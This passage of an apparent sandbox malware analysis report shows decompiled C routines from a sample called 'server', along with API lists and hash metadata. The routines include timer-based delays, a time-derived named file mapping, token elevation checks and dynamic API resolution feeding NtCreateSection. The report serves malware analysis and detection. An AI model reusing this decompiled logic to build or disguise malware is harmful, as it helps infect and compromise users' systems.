                					goto L9;
                				}
                				_t116 =  *_t82(0,  &_v72);
                				if(_t116 != 0) {
                					goto L33;
                				}
                				goto L6;
                			}

                APIs
                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0222803E
                • LoadLibraryA.KERNELBASE(?), ref: 022280BB
                • GetLastError.KERNEL32 ref: 022280C7
                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 022280FA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                • String ID: $
                • API String ID: 948315288-3993045852
                • Opcode ID: cec0ae2a672caee7b5eae06432683825ca4fc10e8b6f89f680089c0aa7cb2b2c
                • Instruction ID: 7fcfa91b114444df3c2c448695687412ca875ac9c7fb517a91cda4e3af93b867
                • Opcode Fuzzy Hash: cec0ae2a672caee7b5eae06432683825ca4fc10e8b6f89f680089c0aa7cb2b2c
                • Instruction Fuzzy Hash: 68813071A10216BFDB20CFD8D884B9E77F5FB48310F154429E905D7294E772EA49CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 83%
                			E02226815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				void _v48;
                				long _v52;
                				struct %anon52 _v60;
                				char _v72;
                				long _v76;
                				void* _v80;
                				union _LARGE_INTEGER _v84;
                				struct %anon52 _v92;
                				void* _v96;
                				void* _v100;
                				union _LARGE_INTEGER _v104;
                				long _v108;
                				struct %anon52 _v124;
                				long _v128;
                				struct %anon52 _t46;
                				void* _t51;
                				long _t53;
                				void* _t54;
                				struct %anon52 _t61;
                				long _t65;
                				struct %anon52 _t66;
                				void* _t69;
                				void* _t73;
                				signed int _t74;
                				void* _t76;
                				void* _t78;
                				void** _t82;
                				signed int _t86;
                				void* _t89;
                
                				_t76 = __edx;
                				_v52 = 0;
                				memset( &_v48, 0, 0x2c);
                				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                				_t46 = CreateWaitableTimerA(0, 1, 0);
                				_v60 = _t46;
                				if(_t46 == 0) {
                					_v92.HighPart = GetLastError();
                				} else {
                					_push(0xffffffff); // 64-bit constant 0xffffffffff676980 = -10,000,000 FILETIME ticks (100 ns): one second as a relative due time
                					_push(0xff676980);
                					_push(0);
                					_push( *0x222a2e0); // multiplier: delay in seconds held in this global
                					_v76 = 0;
                					_v80 = 0;
                					L022282DA(); // _allmul: seconds * -10,000,000 -> negative (relative) 64-bit due time in edx:eax
                					_v84.LowPart = _t46;
                					_v80 = _t76;
                					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0); // one-shot timer; WaitForMultipleObjects below waits on it and on the second handle (*0x222a30c)
                					_t51 =  *0x222a30c; // 0x1b0
                					_v76 = _t51;
                					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                					_v108 = _t53;
                					if(_t53 == 0) {
                						if(_a8 != 0) {
                							L4:
                							 *0x222a2ec = 5;
                						} else {
                							_t69 = E02225251(_t76); // executed
                							if(_t69 != 0) {
                								goto L4;
                							}
                						}
                						_v104.LowPart = 0;
                						L6:
                						if(_v104.LowPart == 1 && ( *0x222a300 & 0x00000001) == 0) {
                							_v104.LowPart = 2;
                						}
                						_t74 = _v104.LowPart;
                						_t58 = _t74 << 4;
                						_t78 = _t89 + (_t74 << 4) + 0x38;
                						_t75 = _t74 + 1;
                						_v92.LowPart = _t74 + 1;
                						_t61 = E022235D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100);
                						_v124 = _t61;
                						if(_t61 != 0) {
                							goto L17;
                						}
                						_t66 = _v92;
                						_v104.LowPart = _t66;
                						if(_t66 != 3) {
                							goto L6;
                						} else {
                							_v124.HighPart = E022269E6(_t75,  &_v72, _a4, _a8);
                						}
                						goto L12;
                						L17:
                						__eflags = _t61 - 0x10d2;
                						if(_t61 != 0x10d2) {
                							_push(0xffffffff);
                							_push(0xff676980);
                							_push(0);
                							_push( *0x222a2e4);
                							goto L21;
                						} else {
                							__eflags =  *0x222a2e8; // 0x0
                							if(__eflags == 0) {
                								goto L12;
                							} else {
                								_t61 = E022263F6();
                								_push(0xffffffff); // 0xffffffffdc3cba00 = -600,000,000 ticks = 60 seconds, relative
                								_push(0xdc3cba00);
                								_push(0);
                								_push( *0x222a2e8);
                								L21:
                								L022282DA();
                								_v104.LowPart = _t61;
                								_v100 = _t78;
                								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                								_v128 = _t65;
                								__eflags = _t65;
                								if(_t65 == 0) {
                									goto L6;
                								} else {
                									goto L12;
                								}
                							}
                						}
                						L25:
                					}
                					L12:
                					_t82 =  &_v72;
                					_t73 = 3;
                					do {
                						_t54 =  *_t82;
                						if(_t54 != 0) {
                							HeapFree( *0x222a2d8, 0, _t54);
                						}
                						_t82 =  &(_t82[4]);
                						_t73 = _t73 - 1;
                					} while (_t73 != 0);
                					CloseHandle(_v80);
                				}
                				return _v92.HighPart;
                				goto L25;
                			}

                APIs
                • memset.NTDLL ref: 0222682F
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0222683B
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02226863
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02226883
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,022226E9,?), ref: 0222689E
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000), ref: 02226945
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000,?,?), ref: 02226955
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0222698F
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 022269A9
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 022269B5
                  • Part of subcall function 02225251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02BD9218,00000000,?,74D0F710,00000000,74D0F730), ref: 022252A0
                  • Part of subcall function 02225251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02BD9160,?,00000000,30314549,00000014,004F0053,02BD9270), ref: 0222533D
                  • Part of subcall function 02225251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,022268B6), ref: 0222534F
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,022226E9,?,00000000,?,?), ref: 022269C8
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID:
                • API String ID: 3521023985-0
                • Opcode ID: f7c06391faadfa490bc35c1d0f5e1d7965e67416164abff347a6ac83be9f164d
                • Instruction ID: 8cf96a5c9a839e3f8699709e9d3d790e4a779ace8eb1a2c50e8a1a513d8b180e
                • Opcode Fuzzy Hash: f7c06391faadfa490bc35c1d0f5e1d7965e67416164abff347a6ac83be9f164d
                • Instruction Fuzzy Hash: 8D519172819321BFC720AF95DC48DABBBECEB84320F504A1AF89592194D772D55CCF92
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 74%
                			E0222415A(intOrPtr __edx, void** _a4, void** _a8) {
                				intOrPtr _v8;
                				struct _FILETIME* _v12;
                				short _v56;
                				struct _FILETIME* _t12;
                				intOrPtr _t13;
                				void* _t17;
                				void* _t21;
                				intOrPtr _t27;
                				long _t28;
                				void* _t30;
                
                				_t27 = __edx;
                				_t12 =  &_v12;
                				GetSystemTimeAsFileTime(_t12);
                				_push(0x192); // 64-bit divisor 0x19254d38000 = 1,728,000,000,000 FILETIME ticks (100 ns) = 48 hours
                				_push(0x54d38000);
                				_push(_v8);
                				_push(_v12);
                				L022282D4(); // _aulldiv: current time / 48 h, so the value formatted into the mapping name below changes only every two days
                				_push(_t12);
                				_v12 = _t12;
                				_t13 =  *0x222a348; // 0x9ad5a8
                				_t5 = _t13 + 0x222b7b4; // 0x2bd8d5c
                				_t6 = _t13 + 0x222b644; // 0x530025
                				_push(0x16);
                				_push( &_v56);
                				_v8 = _t27;
                				L02227F3A();
                				_t17 = CreateFileMappingW(0xffffffff, 0x222a34c, 4, 0, 0x1000,  &_v56); // executed; INVALID_HANDLE_VALUE = pagefile-backed, PAGE_READWRITE, 0x1000 bytes, name built by _snwprintf above
                				_t30 = _t17;
                				if(_t30 == 0) {
                					_t28 = GetLastError();
                				} else {
                					if(GetLastError() == 0xb7) { // ERROR_ALREADY_EXISTS: the mapping was created earlier; a freshly created one yields error 2 below
                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed; FILE_MAP_READ | FILE_MAP_WRITE
                						if(_t21 == 0) {
                							_t28 = GetLastError();
                							if(_t28 != 0) {
                								goto L6;
                							}
                						} else {
                							 *_a4 = _t30;
                							 *_a8 = _t21;
                							_t28 = 0;
                						}
                					} else {
                						_t28 = 2;
                						L6:
                						CloseHandle(_t30);
                					}
                				}
                				return _t28;
                			}

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?,?), ref: 02224166
                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0222417C
                • _snwprintf.NTDLL ref: 022241A1
                • CreateFileMappingW.KERNELBASE(000000FF,0222A34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 022241BD
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?), ref: 022241CF
                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 022241E6
                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53), ref: 02224207
                • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,022225B1,?,?,4D283A53,?), ref: 0222420F
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: 1a5a4ac9fbd124bc9825f0bc7e7376f04c2218791d5f3cc49714e5c5280f2975
                • Instruction ID: 489410de2556462a1b8d69b2863cad7811bd6135dc1df7db5cbfe6cd43e3f837
                • Opcode Fuzzy Hash: 1a5a4ac9fbd124bc9825f0bc7e7376f04c2218791d5f3cc49714e5c5280f2975
                • Instruction Fuzzy Hash: 21212B72950328BBD720EBE4DC09F9D37B9AB84704F220120F509E7194D7B29A4DCB50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0050024D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID: cess$kernel32.dll
                • API String ID: 4275171209-1230238691
                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction ID: 2a9954c425b5c615df3655688d6329589181e04494bf30fe7994701720054a9d
                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                • Instruction Fuzzy Hash: 2E526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94DAB291DB30AE95DF14
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 93%
                			E02224BE7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                				void* _t17;
                				void* _t18;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                				intOrPtr _t24;
                				void* _t37;
                				void* _t41;
                				intOrPtr* _t45;
                
                				_t41 = __edi;
                				_t37 = __ebx;
                				_t45 = __eax;
                				_t16 =  *((intOrPtr*)(__eax + 0x20));
                				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                					E022216B2(_t16, __ecx, 0xea60); // waits on the handle at +0x20 with a 60,000 ms (0xea60) timeout; see WaitForMultipleObjects in the subcall list below
                				}
                				_t17 =  *(_t45 + 0x18);
                				_push(_t37);
                				_push(_t41);
                				if(_t17 != 0) {
                					InternetSetStatusCallback(_t17, 0);
                					InternetCloseHandle( *(_t45 + 0x18)); // executed
                				}
                				_t18 =  *(_t45 + 0x14);
                				if(_t18 != 0) {
                					InternetSetStatusCallback(_t18, 0);
                					InternetCloseHandle( *(_t45 + 0x14));
                				}
                				_t19 =  *(_t45 + 0x10);
                				if(_t19 != 0) {
                					InternetSetStatusCallback(_t19, 0);
                					InternetCloseHandle( *(_t45 + 0x10));
                				}
                				_t20 =  *(_t45 + 0x1c);
                				if(_t20 != 0) {
                					CloseHandle(_t20);
                				}
                				_t21 =  *(_t45 + 0x20);
                				if(_t21 != 0) {
                					CloseHandle(_t21);
                				}
                				_t22 =  *((intOrPtr*)(_t45 + 8));
                				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                					E022261DA(_t22);
                					 *((intOrPtr*)(_t45 + 8)) = 0;
                					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                				}
                				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                					E022261DA(_t23);
                				}
                				_t24 =  *_t45;
                				if(_t24 != 0) {
                					_t24 = E022261DA(_t24);
                				}
                				_t46 =  *((intOrPtr*)(_t45 + 4));
                				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                					return E022261DA(_t46);
                				}
                				return _t24;
                			}

                APIs
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C15
                • InternetCloseHandle.WININET(?), ref: 02224C1A
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C25
                • InternetCloseHandle.WININET(?), ref: 02224C2A
                • InternetSetStatusCallback.WININET(?,00000000), ref: 02224C35
                • InternetCloseHandle.WININET(?), ref: 02224C3A
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02222248,?,?,74CF81D0,00000000,00000000), ref: 02224C4A
                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,02222248,?,?,74CF81D0,00000000,00000000), ref: 02224C54
                  • Part of subcall function 022216B2: WaitForMultipleObjects.KERNEL32(00000002,02227C47,00000000,02227C47,?,?,?,02227C47,0000EA60), ref: 022216CD
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                • String ID:
                • API String ID: 2824497044-0
                • Opcode ID: efbc3d252f667f403c8d2f5a98604a8f64a8132cb5597e7f8b94c3428a8470c8
                • Instruction ID: 9e268551ff996fee5cf6ebd06fee62baaa065c3a805a4e73983b84ab6a33c327
                • Opcode Fuzzy Hash: efbc3d252f667f403c8d2f5a98604a8f64a8132cb5597e7f8b94c3428a8470c8
                • Instruction Fuzzy Hash: B4116D36A107787BC530BFE9ED84C1BB7EEAB442083551D18F089D3625C732F88D8A20
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			E02225E40(long* _a4) {
                				long _v8;
                				void* _v12;
                				void _v16;
                				long _v20;
                				int _t33;
                				void* _t46;
                
                				_v16 = 1; // default result: treated as elevated
                				_v20 = 0x2000; // default integrity RID: SECURITY_MANDATORY_MEDIUM_RID
                				if( *0x222a2fc > 5) { // only where integrity levels exist (the global presumably holds the OS major version)
                					_v16 = 0;
                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // current process; READ_CONTROL | TOKEN_QUERY
                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; 0x14 = TokenElevation -> _v16
                						_v8 = 0;
                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; 0x19 = TokenIntegrityLevel, size query only
                						if(_v8 != 0) {
                							_t46 = E022233DC(_v8); // heap-allocate the TOKEN_MANDATORY_LABEL buffer
                							if(_t46 != 0) {
                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                								if(_t33 != 0) {
                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff)); // integrity level = last sub-authority of the label SID
                								}
                								E022261DA(_t46);
                							}
                						}
                						CloseHandle(_v12);
                					}
                				}
                				 *_a4 = _v20;
                				return _v16;
                			}

                APIs
                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02225E72
                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02225E92
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02225EA2
                • CloseHandle.KERNEL32(00000000), ref: 02225EF2
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02225EC5
                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02225ECD
                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02225EDD
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                • String ID:
                • API String ID: 1295030180-0
                • Opcode ID: 87525aae5686bfac32aa0c9916c57062050f97d289a6abbeeab68aaf2549aa04
                • Instruction ID: eaec648a3ef9c7d397d73e574188ce94e314d13a3c5293d6f3a44c39a9c39201
                • Opcode Fuzzy Hash: 87525aae5686bfac32aa0c9916c57062050f97d289a6abbeeab68aaf2549aa04
                • Instruction Fuzzy Hash: B3214A75D0021DBFEB10DFD0DC84EAEBB79EB48314F1044A5E910A6160DB729B58DF50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 64%
                			E02226675(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                				intOrPtr _v8;
                				intOrPtr _t9;
                				intOrPtr _t13;
                				char* _t19;
                				char* _t28;
                				void* _t33;
                				void* _t34;
                				char* _t36;
                				void* _t38;
                				intOrPtr* _t39;
                				char* _t40;
                				char* _t42;
                				char* _t43;
                
                				_t34 = __edx;
                				_push(__ecx);
                				_t9 =  *0x222a348; // 0x9ad5a8
                				_t1 = _t9 + 0x222b516; // 0x253d7325
                				_t36 = 0;
                				_t28 = E02225815(__ecx, _t1);
                				if(_t28 != 0) {
                					_t39 = __imp__; // lstrlen (see the APIs list below)
                					_t13 =  *_t39(_t28, _t38);
                					_v8 = _t13;
                					_t6 =  *_t39(_a4) + 1; // 0x2bd9601
                					_t40 = E022233DC(_v8 + _t6);
                					if(_t40 != 0) {
                						strcpy(_t40, _t28);
                						_pop(_t33);
                						__imp__(_t40, _a4);
                						_t19 = E02225063(_t33, _t34, _t40, _a8); // executed
                						_t36 = _t19;
                						E022261DA(_t40);
                						_t42 = E02224AC7(StrTrimA(_t36, "="), _t36);
                						if(_t42 != 0) {
                							E022261DA(_t36);
                							_t36 = _t42;
                						}
                						_t43 = E02222708(_t36, _t33);
                						if(_t43 != 0) {
                							E022261DA(_t36);
                							_t36 = _t43;
                						}
                					}
                					E022261DA(_t28);
                				}
                				return _t36;
                			}

                0x02226675
                0x02226678
                0x02226679
                0x02226680
                0x02226687
                0x0222668e
                0x02226692
                0x02226699
                0x022266a0
                0x022266a5
                0x022266ad
                0x022266b7
                0x022266bb
                0x022266bf
                0x022266c5
                0x022266ca
                0x022266d4
                0x022266da
                0x022266dc
                0x022266f3
                0x022266f7
                0x022266fa
                0x022266ff
                0x022266ff
                0x02226708
                0x0222670c
                0x0222670f
                0x02226714
                0x02226714
                0x0222670c
                0x02226717
                0x0222671c
                0x02226722

                APIs
                  • Part of subcall function 02225815: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0222668E,253D7325,00000000,00000000,?,7491C740,02223ECE), ref: 0222587C
                  • Part of subcall function 02225815: sprintf.NTDLL ref: 0222589D
                • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A0
                • lstrlen.KERNEL32(00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266A8
                  • Part of subcall function 022233DC: RtlAllocateHeap.NTDLL(00000000,00000000,022262F6), ref: 022233E8
                • strcpy.NTDLL ref: 022266BF
                • lstrcat.KERNEL32(00000000,00000000), ref: 022266CA
                  • Part of subcall function 02225063: lstrlen.KERNEL32(00000000,00000000,02223ECE,00000000,?,022266D9,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 02225074
                  • Part of subcall function 022261DA: RtlFreeHeap.NTDLL(00000000,00000000,02226383,00000000,?,00000000,00000000), ref: 022261E6
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02223ECE,?,7491C740,02223ECE,00000000,02BD9600), ref: 022266E7
                  • Part of subcall function 02224AC7: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,022266F3,00000000,?,7491C740,02223ECE,00000000,02BD9600), ref: 02224AD1
                  • Part of subcall function 02224AC7: _snprintf.NTDLL ref: 02224B2F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: acb067bf1d042b38d33b48fc227e6b8837deb4ca2ab97913cdebebbe9d2f16db
                • Instruction ID: ba82c147afc8927e87627952fafa3f5762e32d95e096ea7bd1dbfa7c53eb76f2
                • Opcode Fuzzy Hash: acb067bf1d042b38d33b48fc227e6b8837deb4ca2ab97913cdebebbe9d2f16db
                • Instruction Fuzzy Hash: AF119133921239774622BBE8AC84CBE36AE9F457643154015F904AB219DE67DA0A4BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 424 401202-401214 call 4012e6 427 4012d5 424->427 428 40121a-40124f GetModuleHandleA GetProcAddress 424->428 429 4012dc-4012e3 427->429 430 401251-401265 GetProcAddress 428->430 431 4012cd-4012d3 call 401ba9 428->431 430->431 432 401267-40127b GetProcAddress 430->432 431->429 432->431 434 40127d-401291 GetProcAddress 432->434 434->431 436 401293-4012a7 GetProcAddress 434->436 436->431 437 4012a9-4012ba call 40110b 436->437 439 4012bf-4012c4 437->439 439->431 440 4012c6-4012cb 439->440 440->429
                C-Code - Quality: 100%
                			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                				intOrPtr _v8;
                				_Unknown_base(*)()* _t29;
                				_Unknown_base(*)()* _t33;
                				_Unknown_base(*)()* _t36;
                				_Unknown_base(*)()* _t39;
                				_Unknown_base(*)()* _t42;
                				intOrPtr _t46;
                				struct HINSTANCE__* _t50;
                				intOrPtr _t56;
                
                				_t56 = E004012E6(0x20);
                				if(_t56 == 0) {
                					_v8 = 8;
                				} else {
                					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                					_v8 = 0x7f;
                					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                					 *(_t56 + 0xc) = _t29;
                					if(_t29 == 0) {
                						L8:
                						E00401BA9(_t56);
                					} else {
                						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                						 *(_t56 + 0x10) = _t33;
                						if(_t33 == 0) {
                							goto L8;
                						} else {
                							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                							 *(_t56 + 0x14) = _t36;
                							if(_t36 == 0) {
                								goto L8;
                							} else {
                								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                								 *(_t56 + 0x18) = _t39;
                								if(_t39 == 0) {
                									goto L8;
                								} else {
                									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                									 *(_t56 + 0x1c) = _t42;
                									if(_t42 == 0) {
                										goto L8;
                									} else {
                										 *((intOrPtr*)(_t56 + 8)) = _a8;
                										 *((intOrPtr*)(_t56 + 4)) = _a4;
                										_t46 = E0040110B(_t56, _a12); // executed
                										_v8 = _t46;
                										if(_t46 != 0) {
                											goto L8;
                										} else {
                											 *_a16 = _t56;
                										}
                									}
                								}
                							}
                						}
                					}
                				}
                				return _v8;
                			}

                0x00401210
                0x00401214
                0x004012d5
                0x0040121a
                0x00401232
                0x00401241
                0x00401248
                0x0040124a
                0x0040124f
                0x004012cd
                0x004012ce
                0x00401251
                0x0040125e
                0x00401260
                0x00401265
                0x00000000
                0x00401267
                0x00401274
                0x00401276
                0x0040127b
                0x00000000
                0x0040127d
                0x0040128a
                0x0040128c
                0x00401291
                0x00000000
                0x00401293
                0x004012a0
                0x004012a2
                0x004012a7
                0x00000000
                0x004012a9
                0x004012af
                0x004012b5
                0x004012ba
                0x004012bf
                0x004012c4
                0x00000000
                0x004012c6
                0x004012c9
                0x004012c9
                0x004012c4
                0x004012a7
                0x00401291
                0x0040127b
                0x00401265
                0x0040124f
                0x004012e3

                APIs
                  • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                  • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401168
                  • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                Memory Dump Source
